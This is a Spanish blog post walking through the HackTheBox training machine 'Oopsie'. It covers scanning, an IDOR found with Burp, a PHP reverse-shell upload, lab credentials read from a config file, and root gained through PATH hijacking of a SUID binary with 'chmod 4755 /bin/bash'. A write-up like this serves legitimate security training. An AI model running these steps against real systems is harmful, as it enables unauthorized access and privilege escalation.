<!DOCTYPE html>
<html lang="es"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>Maquinas para empezar en HTB | Blog de Hacking</title>
<meta name="generator" content="Jekyll v3.9.3" />
<meta property="og:title" content="Maquinas para empezar en HTB" />
<meta name="author" content="K0Hack" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="En esta ocasion empezaremos con el Writeup de la maquina de StartingPoint de HackTheBox llamada Oopsie" />
<meta property="og:description" content="En esta ocasion empezaremos con el Writeup de la maquina de StartingPoint de HackTheBox llamada Oopsie" />
<link rel="canonical" href="http://localhost:4000/2021/05/15/Maquina-Oopsie.html" />
<meta property="og:url" content="http://localhost:4000/2021/05/15/Maquina-Oopsie.html" />
<meta property="og:site_name" content="Blog de Hacking" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2021-05-15T00:00:00-03:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Maquinas para empezar en HTB" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"K0Hack"},"dateModified":"2021-05-15T00:00:00-03:00","datePublished":"2021-05-15T00:00:00-03:00","description":"En esta ocasion empezaremos con el Writeup de la maquina de StartingPoint de HackTheBox llamada Oopsie","headline":"Maquinas para empezar en HTB","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/2021/05/15/Maquina-Oopsie.html"},"url":"http://localhost:4000/2021/05/15/Maquina-Oopsie.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/css/style.css">
  <link rel="icon" type="image/png" href="/assets/favicon.png" /><link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="Blog de Hacking" /></head>
<body><div class="site-header">
  <div class="wrapper">
    <a class="site-title" rel="author" href="/">Blog de Hacking<b class="command_prompt"></b><b class="blinking_cursor">_</b></a>
    <span class="social_links">
        <a class="color--hover" href=""><i class="fab fa-"></i></a><a class="color--hover" href=""><i class="fab fa-"></i></a><a class="color--hover" href=""><i class="fab fa-"></i></a>
    </span>
  </div>
</div>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        
  <div class="author-box">
    
    
        <img src="" class="author-avatar" alt="Avatar" />
    
Blog Personal de K0Hack sobre Conceptos Hacking Etico // HTB // TryHackMe // Resumenes de Hacking // Herramientas para distintas tareas.

</div>


<div class="post">
  <h1 class="post-title">Maquinas para empezar en HTB</h1>
  
  <div class="post-tags">
     
      <a class="tag" href="/tag/HTB,/">HTB,</a>
      
      <a class="tag" href="/tag/Empezando,/">Empezando,</a>
      
      <a class="tag" href="/tag/Hacking,/">Hacking,</a>
      
      <a class="tag" href="/tag/Starting/">Starting</a>
      
  </div>
  
  <div class="post-date">Published on 15 May 2021</div>
  
  <noscript>
    <div class="post-description">En esta ocasion empezaremos con el Writeup de la maquina de StartingPoint de HackTheBox llamada Oopsie</div>
  </noscript>
  <div id="animated-post-description" class="post-description" style="display: none;"></div>
  
  <h1 id="oopsie--hack-the-box">Oopsie ~ Hack The Box</h1>

<p>Comprobamos que la maquina este activa con una traza ICMP, usamos la herramienta PING.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># ping -c 10 10.10.10.28                                                                                   </span>
PING 10.10.10.28 <span class="o">(</span>10.10.10.28<span class="o">)</span> 56<span class="o">(</span>84<span class="o">)</span> bytes of data.
64 bytes from 10.10.10.28: <span class="nv">icmp_seq</span><span class="o">=</span>1 <span class="nv">ttl</span><span class="o">=</span>63 <span class="nb">time</span><span class="o">=</span>39.0 ms
64 bytes from 10.10.10.28: <span class="nv">icmp_seq</span><span class="o">=</span>2 <span class="nv">ttl</span><span class="o">=</span>63 <span class="nb">time</span><span class="o">=</span>39.2 ms
64 bytes from 10.10.10.28: <span class="nv">icmp_seq</span><span class="o">=</span>3 <span class="nv">ttl</span><span class="o">=</span>63 <span class="nb">time</span><span class="o">=</span>38.9 ms
^C
<span class="nt">---</span> 10.10.10.28 ping statistics <span class="nt">---</span>
3 packets transmitted, 3 received, 0% packet loss, <span class="nb">time </span>2004ms
rtt min/avg/max/mdev <span class="o">=</span> 38.941/39.048/39.192/0.105 ms
</code></pre></div></div>
<h1 id="enumeracion-con-nmap">Enumeracion con Nmap</h1>

<p>Procedemos a enumerar todos los puertos abiertos en un escaneo usando los siguiente parametros:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="s2">"nmap -p- --open -T5 -v -n -Pn 10.10.10.28   "</span> 
</code></pre></div></div>
<p>Si en la maquina victima el escaneo con Nmap va lento..
 Usamos el siguiente escaneo:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="s2">"nmap -p- --open -sS --min-rate 4000 -vvv -n -Pn 10.10.10.28 -oG allports    "</span>
</code></pre></div></div>
<p>Con la funcion de extractPorts: filtramos por los puertos abiertos pasandole el archivo de salida del primer escaneo con Nmap</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># extractPorts allports</span>

<span class="o">[</span><span class="k">*</span><span class="o">]</span> Extracting information .......

        <span class="o">[</span><span class="k">*</span><span class="o">]</span>IP ADDRESS: 10.10.10.28
        <span class="o">[</span><span class="k">*</span><span class="o">]</span>OPEN PORTS: 22,80

<span class="o">[</span><span class="k">*</span><span class="o">]</span> Puertos han sido copiados to clipboard .......
</code></pre></div></div>
<p>2.- Siguiente Escaneo con Nmap</p>

<p>Procedemos a escanear la version y servicios de los puerto encontrados como abiertos:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-p22</span>,80 <span class="nt">-oN</span> Target 10.10.10.28
</code></pre></div></div>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey: 
|   2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 <span class="o">(</span>RSA<span class="o">)</span>
|   256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 <span class="o">(</span>ED25519<span class="o">)</span>
80/tcp open  http    Apache httpd 2.4.29 <span class="o">((</span>Ubuntu<span class="o">))</span>
|_http-server-header: Apache/2.4.29 <span class="o">(</span>Ubuntu<span class="o">)</span>
|_http-title: Welcome
Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel
</code></pre></div></div>
<p>Enumeramos con la herramienta <code class="language-plaintext highlighter-rouge">whatweb</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">cat </span>content/whatweb.txt 
http://10.10.10.28/ <span class="o">[</span>200 OK] Apache[2.4.29], Country[RESERVED][ZZ], Email[admin@megacorp.com], HTML5,
HTTPServer[Ubuntu Linux][Apache/2.4.29 <span class="o">(</span>Ubuntu<span class="o">)]</span>, IP[10.10.10.28], Script, Title[Welcome]
</code></pre></div></div>
<p>Nos saca un Email <code class="language-plaintext highlighter-rouge">admin@megacorp.com</code>
Hechamos un vistazo a la pagina web:
<a href="https://ibb.co/G9fVChw"><img src="https://i.ibb.co/MfyRPXT/Inicio-web.png" alt="Inicio-web.png" border="0" /></a></p>

<p>hacemos Ctrl+u para ver el codigo fuente de la pagina</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>   &lt;/script&gt;
&lt;script <span class="nv">src</span><span class="o">=</span><span class="s2">"/cdn-cgi/login/script.js"</span><span class="o">&gt;</span>&lt;/script&gt;
&lt;script <span class="nv">src</span><span class="o">=</span><span class="s2">"/js/index.js"</span><span class="o">&gt;</span>&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;
</code></pre></div></div>
<p>encontramos este redireccionamiento a la ruta <code class="language-plaintext highlighter-rouge">cdn-cgi/login/script.js</code>
Probamos la ruta sin el <code class="language-plaintext highlighter-rouge">script.js</code>
<a href="https://ibb.co/0Yd0rKF"><img src="https://i.ibb.co/F8jQzX0/login-web.png" alt="Login-web.png" border="0" /></a></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://10.10.10.28/cdn-cgi/login/admin.php
</code></pre></div></div>
<p>Para esta maquina probamos las credenciales obtenidas en la Maquina ARCHETYPE</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>User: admin
Pass: MEGACORP_4dm1n!!
</code></pre></div></div>
<p>Nos conseguimos loguear corectamente a la pagina web.</p>

<p><a href="https://ibb.co/StxDMCy"><img src="https://i.ibb.co/QPc7TwQ/Inside-web.png" alt="Inside-web.png" border="0" /></a></p>

<p>Una vez dentro vemos que tenemos un campo de <code class="language-plaintext highlighter-rouge">Uploads</code> intentamos hacer uso y vemos que el user administrador de la web tiene puesto algun tipo de restriccion de seguridad
para todos los Users menos el Super Admin</p>

<h1 id="usamos-la-herramienta-bursuite-para-encontrar-atraves-de-un-ataque-de-tipo-intruder-al-super-admin-en-la-pestaña-accounts-atraves-del-campo-id">Usamos la herramienta <code class="language-plaintext highlighter-rouge">Bursuite</code> para encontrar atraves de un ataque de tipo intruder al super admin en la pestaña accounts atraves del campo id</h1>

<p><a href="https://ibb.co/5MDc1Kd"><img src="https://i.ibb.co/ZLsTf23/burpsuite-1.png" alt="Burpsuite-1.png" border="0" /></a></p>

<p>Una vez encontramos el <code class="language-plaintext highlighter-rouge">id=30</code> para el <code class="language-plaintext highlighter-rouge">Super Admin</code></p>

<p><a href="https://ibb.co/DtJbWGK"><img src="https://i.ibb.co/c1Bv3bT/Burpsuite-2.png" alt="Burpsuite-2.png" border="0" /></a></p>

<p>Identificamos el valor Access ID que nos va a permitir entrar en la pestaña uploads para intentar subir nuestro <code class="language-plaintext highlighter-rouge">php-reverse-shell.php malicioso</code> 
y que la maquina nos lo interprete para conseguir una terminal como <code class="language-plaintext highlighter-rouge">www-data</code></p>

<p><a href="https://ibb.co/m0Cqx00"><img src="https://i.ibb.co/C657r66/Screenshot-2021-05-15-19-38-45-2.png" alt="Screenshot-2021-05-15-19-38-45-2.png" border="0" /></a></p>

<p>Procedemos a Usar <code class="language-plaintext highlighter-rouge">Burpsuite</code>otra vez para subir nuestro archivo <code class="language-plaintext highlighter-rouge">php malicioso</code></p>

<p><a href="https://ibb.co/R3jq6Vm"><img src="https://i.ibb.co/zX6z20Y/Burpsuite-Rshell.png" alt="Burpsuite-Rshell.png" border="0" /></a></p>

<p>Conseguimos nuestra shell como el user <code class="language-plaintext highlighter-rouge">www-data</code> apuntando a la ruta de nuestro archivo <code class="language-plaintext highlighter-rouge">php malicioso</code> que acabamos de subir</p>

<p>Buscamos por usuarios a nivel de sistema:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>www-data@oopsie:/<span class="nv">$ </span><span class="nb">cd </span>home/
www-data@oopsie:/home<span class="nv">$ </span><span class="nb">ls
</span>robert
www-data@oopsie:/home<span class="nv">$ </span><span class="nb">cd </span>robert/
www-data@oopsie:/home/robert<span class="nv">$ </span><span class="nb">ls
</span>user.txt
www-data@oopsie:/home/robert<span class="nv">$ </span><span class="nb">cat </span>user.txt 
f2c74ee8db7983851ab2a96a
</code></pre></div></div>
<p>Ahi tendriamos la primera flag o user.txt</p>

<h1 id="escalada-de-privilegios">Escalada de Privilegios</h1>

<p>Nos dedicamos a enumerar el sistema en la ruta de la web para ver si encontramos algun fichero de configuracion con las credenciales del user administrador</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>www-data@oopsie:/var/www/html/cdn-cgi/login<span class="nv">$ </span><span class="nb">cat </span>db.php 
&lt;?php
<span class="nv">$conn</span> <span class="o">=</span> mysqli_connect<span class="o">(</span><span class="s1">'localhost'</span>,<span class="s1">'robert'</span>,<span class="s1">'M3g4C0rpUs3r!'</span>,<span class="s1">'garage'</span><span class="o">)</span><span class="p">;</span>
?&gt;
</code></pre></div></div>
<p>Credenciales para la base de datos de mysql o 
para probar comprobar si se hace uso de la reutilizacion de credenciales a nivel de sistema por el servicio SSH:</p>

<p><code class="language-plaintext highlighter-rouge">robert</code>
<code class="language-plaintext highlighter-rouge">M3g4c0rpUs3r!</code></p>

<p>Probamos con el servicio SSH a conectarnos como el usuario Robert</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># ssh robert@10.10.10.28              </span>
The authenticity of host <span class="s1">'10.10.10.28 (10.10.10.28)'</span> can<span class="s1">'t be established.
ECDSA key fingerprint is SHA256:JmIUfqU8/Xv/1Fy/m/Clya5iX2K756n/EGu0eeJb5xc.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '</span>10.10.10.28<span class="s1">' (ECDSA) to the list of known hosts.
robert@10.10.10.28'</span>s password: 
Welcome to Ubuntu 18.04.3 LTS <span class="o">(</span>GNU/Linux 4.15.0-76-generic x86_64<span class="o">)</span>

 <span class="k">*</span> Documentation:  https://help.ubuntu.com
 <span class="k">*</span> Management:     https://landscape.canonical.com
 <span class="k">*</span> Support:        https://ubuntu.com/advantage

  System information as of Sat May 15 18:07:17 UTC 2021

  System load:  0.0                Processes:             140
  Usage of /:   25.6% of 19.56GB   Users logged <span class="k">in</span>:       0
  Memory usage: 20%                IP address <span class="k">for </span>ens160: 10.10.10.28
  Swap usage:   0%

 <span class="k">*</span> Canonical Livepatch is available <span class="k">for </span>installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

0 packages can be updated.
0 updates are security updates.

Last login: Sat Jan 25 10:20:16 2020 from 172.16.118.129
robert@oopsie:~<span class="nv">$ </span><span class="nb">ls
</span>user.txt
</code></pre></div></div>
<p>Listamos por permisos <code class="language-plaintext highlighter-rouge">SUID</code> ya que vemos que con <code class="language-plaintext highlighter-rouge">$sudo -l</code> no tenemos privilegio para usar <code class="language-plaintext highlighter-rouge">sudo</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>robert@oopsie:~<span class="nv">$ </span>find / <span class="nt">-perm</span> <span class="nt">-u</span><span class="o">=</span>s <span class="nt">-type</span> f 2&gt;/dev/null | xargs <span class="nb">ls</span> <span class="nt">-l</span>
<span class="nb">.</span>
<span class="nb">.</span>
<span class="nt">-rwsr-xr--</span> 1 root   bugtracker        8792 Jan 25  2020 /usr/bin/bugtracker
<span class="nb">.</span>
</code></pre></div></div>
<p>Nos llama la atencion un permiso SUID como root a un binario personalizado. Vamos a probar a ejecutarlo para ver lo que hace:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>robert@oopsie:~<span class="nv">$ </span>/usr/bin/bugtracker
<span class="nt">------------------</span>
: EV Bug Tracker :
<span class="nt">------------------</span>
Provide Bug ID: 0
<span class="nt">---------------</span>

<span class="nb">cat</span>: /root/reports/0: No such file or directory
</code></pre></div></div>
<p>Vemos que usar el binario cat y no lo llama de manera absoluta(Con su ruta entera). Se me ocurre la idea de hacer un path Hijacking, creando un archivo llamado cat, que nos ejecute el comando 
que nosotros le digamos haciendo uso del permiso SUID y suplantando la ruta del PATH para que pille antes el cat malicioso nuestro.
Nos movemos a la ruta <code class="language-plaintext highlighter-rouge">/tmp/</code> y creamos nuestro archivo <code class="language-plaintext highlighter-rouge">cat</code> malicioso para que nos de privilegios SUID a la <code class="language-plaintext highlighter-rouge">/bin/bash</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">chmod </span>4755 /bin/bash
</code></pre></div></div>
<p>Ahora vamos a proceder con el PATH HIJACKING:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">export </span><span class="nv">PATH</span><span class="o">=</span>/tmp:<span class="nv">$PATH</span>
<span class="nb">chmod</span> +x <span class="nb">cat</span>
</code></pre></div></div>
<p>Y procedemos a ejecutar el <code class="language-plaintext highlighter-rouge">/usr/bin/bugtrack</code> para que ejecute nuestro <code class="language-plaintext highlighter-rouge">cat malicioso</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>robert@oopsie:/tmp<span class="nv">$ </span>/usr/bin/bugtracker
<span class="nt">------------------</span>
: EV Bug Tracker :
<span class="nt">------------------</span>

Provide Bug ID: 1
<span class="nt">---------------</span>
</code></pre></div></div>
<p>Comprobamos que la /bin/bash tenga privilegios como SUID para ahora haciendo un <code class="language-plaintext highlighter-rouge">bash -p</code>convertirnos en <code class="language-plaintext highlighter-rouge">root</code> y sacar la flag de administrator.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>robert@oopsie:/tmp<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-l</span> /bin/bash
<span class="nt">-rwsr-xr-x</span> 1 root root 1113504 Jun  6  2019 /bin/bash

robert@oopsie:/tmp<span class="nv">$ </span>bash <span class="nt">-p</span>
bash-4.4# <span class="nb">whoami
</span>root
´´´
Sacando la Flag Root.txt
<span class="sb">```</span>bash
bash-4.4# nano /root/root.txt
f13b0bee69f8a877c3faf667
</code></pre></div></div>
<p>Maquina Rooteada !!</p>

</div>


<div class="comments">
<div id="disqus_thread"></div>
<script>
 var disqus_config = function () {
     this.page.url = 'http://localhost:4000/2021/05/15/Maquina-Oopsie.html';
     this.page.identifier = '/2021/05/15/Maquina Oopsie';
     this.page.title = 'Maquinas para empezar en HTB';
 };

 (function() {  // REQUIRED CONFIGURATION VARIABLE: EDIT THE SHORTNAME BELOW
     var d = document, s = d.createElement('script');

     s.src = '//bitbrain-github-io.disqus.com/embed.js';

     s.setAttribute('data-timestamp', +new Date());
     (d.head || d.body).appendChild(s);
 })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow">comments powered by Disqus.</a></noscript>

</div>




<div class="related">
  <h2>related posts</h2>
  <ul class="related-posts">
    
      <li>
        <h3>
          <a href="/2022/06/27/Trick.html">
            Maquina  Retirada Trick de Hack The Box (Necesario VIP)
          </a>
        </h3>
      </li>
    
      <li>
        <h3>
          <a href="/2022/06/15/Attacktive-Directory.html">
            Maquina Retirada Search de Hack The Box (Necesario VIP)
          </a>
        </h3>
      </li>
    
      <li>
        <h3>
          <a href="/2022/06/05/Search-AD.html">
            Maquina Retirada Search de Hack The Box (Necesario VIP)
          </a>
        </h3>
      </li>
    
  </ul>
</div>




  
  <h2>all tags</h2>
  <div class="tag-cloud"><a href="/tag/%26/" class="set-1">&</a> <a href="/tag/%2C/" class="set-1">,</a> <a href="/tag/1.8%2C/" class="set-1">1.8,</a> <a href="/tag/4.4%2C/" class="set-1">4.4,</a> <a href="/tag/8.6%2C/" class="set-1">8.6,</a> <a href="/tag/ad/" class="set-1">AD</a> <a href="/tag/adrotate%2C/" class="set-1">ADRotate,</a> <a href="/tag/aspreproast/" class="set-1">ASPREPRoast</a> <a href="/tag/asrep-roast%2C/" class="set-1">ASREP-Roast,</a> <a href="/tag/asreproast/" class="set-1">ASREPRoast</a> <a href="/tag/active/" class="set-1">Active</a> <a href="/tag/admin%2C/" class="set-1">Admin,</a> <a href="/tag/admins/" class="set-1">Admins</a> <a href="/tag/admins%2C/" class="set-1">Admins,</a> <a href="/tag/archivos/" class="set-1">Archivos</a> <a href="/tag/attack%2C/" class="set-1">Attack,</a> <a href="/tag/attacks/" class="set-1">Attacks</a> <a href="/tag/autopwn%2C/" class="set-1">AutoPwn,</a> <a href="/tag/azure/" class="set-1">Azure</a> <a href="/tag/bof%2C/" class="set-1">BOF,</a> <a href="/tag/bin/" class="set-1">Bin</a> <a href="/tag/blind%2C/" class="set-1">Blind,</a> <a href="/tag/bloodhound%2C/" class="set-1">BloodHound,</a> <a href="/tag/bruta%2C/" class="set-1">Bruta,</a> <a href="/tag/bruteforce%2C/" class="set-1">BruteForce,</a> <a href="/tag/bruteforce%2C/" class="set-1">Bruteforce,</a> <a href="/tag/burpsuite%2C/" class="set-1">Burpsuite,</a> <a href="/tag/bypass/" class="set-1">ByPass</a> <a href="/tag/bypass%2C/" class="set-1">Bypass,</a> <a href="/tag/ca/" class="set-1">CA</a> <a href="/tag/cgi-bin%2C/" class="set-1">CGI-BIN,</a> <a href="/tag/cron%2C/" class="set-1">CRON,</a> <a href="/tag/csrf/" class="set-1">CSRF</a> <a href="/tag/curl%2C/" class="set-1">CURL,</a> <a href="/tag/chkrootkit%2C/" class="set-1">Chkrootkit,</a> <a href="/tag/churrasco%2C/" class="set-1">Churrasco,</a> <a href="/tag/cifrado/" class="set-1">Cifrado</a> <a href="/tag/command/" class="set-1">Command</a> <a href="/tag/contracts%2C/" class="set-1">Contracts,</a> <a href="/tag/cracking/" class="set-1">Cracking</a> <a href="/tag/crackmapexec%2C/" class="set-1">Crackmapexec,</a> <a href="/tag/cron-taks%2C/" class="set-1">Cron-taks,</a> <a href="/tag/crontabs%2C/" class="set-1">CronTabs,</a> <a href="/tag/crypto%2C/" class="set-1">Crypto,</a> <a href="/tag/curlftp%2C/" class="set-1">CurlFtp,</a> <a href="/tag/decimal%2C/" class="set-1">Decimal,</a> <a href="/tag/device/" class="set-1">Device</a> <a href="/tag/directory%2C/" class="set-1">Directory,</a> <a href="/tag/dockers%2C/" class="set-1">Dockers,</a> <a href="/tag/domain/" class="set-1">Domain</a> <a href="/tag/dominios%2C/" class="set-1">Dominios,</a> <a href="/tag/dovecot%2C/" class="set-1">Dovecot,</a> <a href="/tag/elastix%2C/" class="set-1">Elastix,</a> <a href="/tag/empezando%2C/" class="set-1">Empezando,</a> <a href="/tag/encrypt-decrypt%2C/" class="set-1">Encrypt-Decrypt,</a> <a href="/tag/enumeracion%2C/" class="set-1">Enumeracion,</a> <a href="/tag/enumeration%2C/" class="set-1">Enumeration,</a> <a href="/tag/ethereum%2C/" class="set-1">Ethereum,</a> <a href="/tag/evil-winrm%2C/" class="set-1">Evil-WinRm,</a> <a href="/tag/excel%2C/" class="set-1">Excel,</a> <a href="/tag/excell/" class="set-1">Excell</a> <a href="/tag/execel/" class="set-1">Execel</a> <a href="/tag/exploit%2C/" class="set-1">Exploit,</a> <a href="/tag/fail2ban%2C/" class="set-1">Fail2ban,</a> <a href="/tag/file/" class="set-1">File</a> <a href="/tag/file%2C/" class="set-1">File,</a> <a href="/tag/files%2C/" class="set-1">Files,</a> <a href="/tag/firefox%2C/" class="set-1">Firefox,</a> <a href="/tag/ftp%2C/" class="set-1">Ftp,</a> <a href="/tag/fueza/" class="set-1">Fueza</a> <a href="/tag/fuzzing/" class="set-1">Fuzzing</a> <a href="/tag/fuzzing%2C/" class="set-1">Fuzzing,</a> <a href="/tag/get-adobject%2C/" class="set-1">Get-ADObject,</a> <a href="/tag/getchanges-all%2C/" class="set-1">GetChanges-All,</a> <a href="/tag/gitlab%2C/" class="set-1">GitLab,</a> <a href="/tag/gitbucket%2C/" class="set-1">Gitbucket,</a> <a href="/tag/gratuitas./" class="set-1">Gratuitas.</a> <a href="/tag/group%2C/" class="set-1">Group,</a> <a href="/tag/groups%2C/" class="set-1">Groups,</a> <a href="/tag/guessing%2C/" class="set-1">Guessing,</a> <a href="/tag/gwolle%2C/" class="set-1">Gwolle,</a> <a href="/tag/htb%2C/" class="set-5">HTB,</a> <a href="/tag/hackthebox%2C/" class="set-1">HackTheBox,</a> <a href="/tag/hacking/" class="set-3">Hacking</a> <a href="/tag/hacking%2C/" class="set-2">Hacking,</a> <a href="/tag/heartbleed%2C/" class="set-1">HeartBleed,</a> <a href="/tag/hex%2C/" class="set-1">Hex,</a> <a href="/tag/hijacking%2C/" class="set-1">Hijacking,</a> <a href="/tag/hydra%2C/" class="set-1">Hydra,</a> <a href="/tag/iis%2C/" class="set-1">IIS,</a> <a href="/tag/iis-6.0%2C/" class="set-1">IIS-6.0,</a> <a href="/tag/ipfs%2C/" class="set-1">IPFS,</a> <a href="/tag/ipv6%2C/" class="set-1">IPV6,</a> <a href="/tag/irc%2C/" class="set-1">IRC,</a> <a href="/tag/id-rsa%2C/" class="set-1">Id-Rsa,</a> <a href="/tag/impackect-secretsdump%2C/" class="set-1">Impackect-SecretsDump,</a> <a href="/tag/import/" class="set-1">Import</a> <a href="/tag/inclusion%2C/" class="set-1">Inclusion,</a> <a href="/tag/injection%29%2C/" class="set-1">Injection),</a> <a href="/tag/injection%2C/" class="set-1">Injection,</a> <a href="/tag/jjs%2C/" class="set-1">JJS,</a> <a href="/tag/jndi%2C/" class="set-1">JNDI,</a> <a href="/tag/joomla%2C/" class="set-1">Joomla,</a> <a href="/tag/journalctl%2C/" class="set-1">Journalctl,</a> <a href="/tag/juicypotato%2C/" class="set-1">JuicyPotato,</a> <a href="/tag/kerberoasting/" class="set-1">Kerberoasting</a> <a href="/tag/kerbrute/" class="set-1">Kerbrute</a> <a href="/tag/kerbrute%2C/" class="set-1">Kerbrute,</a> <a href="/tag/kernel/" class="set-1">Kernel</a> <a href="/tag/knocking%2C/" class="set-1">Knocking,</a> <a href="/tag/kubernetes%2C/" class="set-1">Kubernetes,</a> <a href="/tag/ldap/" class="set-1">LDAP</a> <a href="/tag/ldap%2C/" class="set-1">LDAP,</a> <a href="/tag/lfi%2C/" class="set-1">LFI,</a> <a href="/tag/local/" class="set-1">Local</a> <a href="/tag/log4j%2C/" class="set-1">Log4j,</a> <a href="/tag/mail%2C/" class="set-1">Mail,</a> <a href="/tag/malicius/" class="set-1">Malicius</a> <a href="/tag/maquina/" class="set-1">Maquina</a> <a href="/tag/maquinas/" class="set-5">Maquinas</a> <a href="/tag/mattermost%2C/" class="set-1">Mattermost,</a> <a href="/tag/mimikatz.exe%2C/" class="set-1">Mimikatz.exe,</a> <a href="/tag/misconfigurations%2C/" class="set-1">Misconfigurations,</a> <a href="/tag/mongo-db%2C/" class="set-1">Mongo-db,</a> <a href="/tag/mongodb%2C/" class="set-1">MongoDB,</a> <a href="/tag/mr.robot%2C/" class="set-1">Mr.Robot,</a> <a href="/tag/mssqlclient%2C/" class="set-1">Mssqlclient,</a> <a href="/tag/multiples/" class="set-1">Multiples</a> <a href="/tag/myssql-server%2C/" class="set-1">Myssql-Server,</a> <a href="/tag/neo4j%2C/" class="set-1">Neo4j,</a> <a href="/tag/nibbleblog%2C/" class="set-1">NibbleBlog,</a> <a href="/tag/nishang%2C/" class="set-1">Nishang,</a> <a href="/tag/nosqli%2C/" class="set-1">NoSQLI,</a> <a href="/tag/node-red%2C/" class="set-1">Node-Red,</a> <a href="/tag/nostromo/" class="set-1">Nostromo</a> <a href="/tag/os/" class="set-1">OS</a> <a href="/tag/oscp/" class="set-3">OSCP</a> <a href="/tag/osticket%2C/" class="set-1">OSTicket,</a> <a href="/tag/offensive/" class="set-1">Offensive</a> <a href="/tag/olevba/" class="set-1">Olevba</a> <a href="/tag/php%2C/" class="set-1">PHP,</a> <a href="/tag/php./" class="set-1">PHP.</a> <a href="/tag/password/" class="set-1">Password</a> <a href="/tag/path/" class="set-1">Path</a> <a href="/tag/path%2C/" class="set-3">Path,</a> <a href="/tag/pivoting%2C/" class="set-1">Pivoting,</a> <a href="/tag/plugins%2C/" class="set-1">Plugins,</a> <a href="/tag/pods%2Fcontainer./" class="set-1">Pods/Container.</a> <a href="/tag/popd%2C/" class="set-1">PopD,</a> <a href="/tag/port/" class="set-1">Port</a> <a href="/tag/portknocking%2C/" class="set-1">PortKnocking,</a> <a href="/tag/portainer%2C/" class="set-1">Portainer,</a> <a href="/tag/portal%2C/" class="set-1">Portal,</a> <a href="/tag/post-explotacion./" class="set-1">Post-Explotacion.</a> <a href="/tag/powershell/" class="set-1">PowerShell</a> <a href="/tag/powerup%2C/" class="set-1">PowerUp,</a> <a href="/tag/powershell%2C/" class="set-1">Powershell,</a> <a href="/tag/privesc/" class="set-1">Privesc</a> <a href="/tag/privesc%2C/" class="set-1">Privesc,</a> <a href="/tag/proteccions%2C/" class="set-1">Proteccions,</a> <a href="/tag/protection%2C/" class="set-1">Protection,</a> <a href="/tag/python%2C/" class="set-1">Python,</a> <a href="/tag/python3%2C/" class="set-1">Python3,</a> <a href="/tag/rce%2C/" class="set-1">RCE,</a> <a href="/tag/rdp-file%2C/" class="set-1">RDP-file,</a> <a href="/tag/rpcclient%2C/" class="set-1">RPCCLIENT,</a> <a href="/tag/read%2C/" class="set-1">Read,</a> <a href="/tag/readgmsapassword%2C/" class="set-1">ReadGMSAPassword,</a> <a href="/tag/recycle/" class="set-1">Recycle</a> <a href="/tag/remote/" class="set-1">Remote</a> <a href="/tag/retiradas/" class="set-1">Retiradas</a> <a href="/tag/retiradas%2C/" class="set-5">Retiradas,</a> <a href="/tag/retiradas./" class="set-1">Retiradas.</a> <a href="/tag/revome/" class="set-1">Revome</a> <a href="/tag/smb%2C/" class="set-1">SMB,</a> <a href="/tag/snmp%2C/" class="set-1">SNMP,</a> <a href="/tag/sqli/" class="set-1">SQLI</a> <a href="/tag/sqli%2C/" class="set-1">SQLI,</a> <a href="/tag/sqlinjecction%2C/" class="set-1">SQLInjecction,</a> <a href="/tag/ss%2C/" class="set-1">SS,</a> <a href="/tag/ssh%2C/" class="set-1">SSH,</a> <a href="/tag/ssrf/" class="set-1">SSRF</a> <a href="/tag/ssrf%2C/" class="set-1">SSRF,</a> <a href="/tag/ssti%28server/" class="set-1">SSTI(Server</a> 